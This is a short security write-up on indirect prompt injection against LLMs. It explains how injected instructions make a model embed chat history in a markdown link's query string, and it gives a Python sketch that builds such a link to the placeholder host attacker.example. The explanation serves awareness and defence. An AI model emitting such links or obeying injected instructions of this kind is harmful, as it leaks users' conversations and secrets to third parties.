Author: Martin


LLM01: Indirect Prompt Injection | Exfiltration to attacker

In an indirect prompt injection scenario, data can be exfiltrated from a large language model (LLM) by abusing markdown formatting and link rendering: injected instructions cause the model to embed sensitive information in a URL, with chat history appended as query parameters. For instance, an attacker can craft a markdown link that appears harmless but actually encodes extracted data in the URL, directing it to an external server under their control. When the user clicks the link, the browser sends the query parameters, which contain sensitive chat history or model outputs, to the attacker's server, effectively leaking the data without raising suspicion. The method exploits the fact that markdown shows only a hyperlink's display text, not its true destination, making this a stealthy exfiltration vector.
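To make the pattern concrete, here is a minimal Python sketch of how such a link could be constructed. The `attacker.example` domain, the `/collect` path, and the `q` parameter are hypothetical placeholders, not taken from any real incident; in a real attack, the model itself would be tricked into emitting an equivalent link.

```python
from urllib.parse import quote

# Hypothetical attacker-controlled endpoint (placeholder domain).
ATTACKER_URL = "https://attacker.example/collect"


def build_exfil_link(chat_history: str, label: str = "Click here for details") -> str:
    """Encode chat text into the query string of a markdown link.

    This mirrors the exfiltration pattern described above: the visible
    link text looks harmless, while the URL carries the captured data.
    """
    encoded = quote(chat_history, safe="")
    return f"[{label}]({ATTACKER_URL}?q={encoded})"


if __name__ == "__main__":
    history = "User: my API key is sk-12345"
    print(build_exfil_link(history))
    # [Click here for details](https://attacker.example/collect?q=User%3A%20my%20API%20key%20is%20sk-12345)
```

When a chat interface renders this markdown, the user sees only "Click here for details"; clicking it sends the URL-encoded chat history to the attacker's server as a query parameter.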
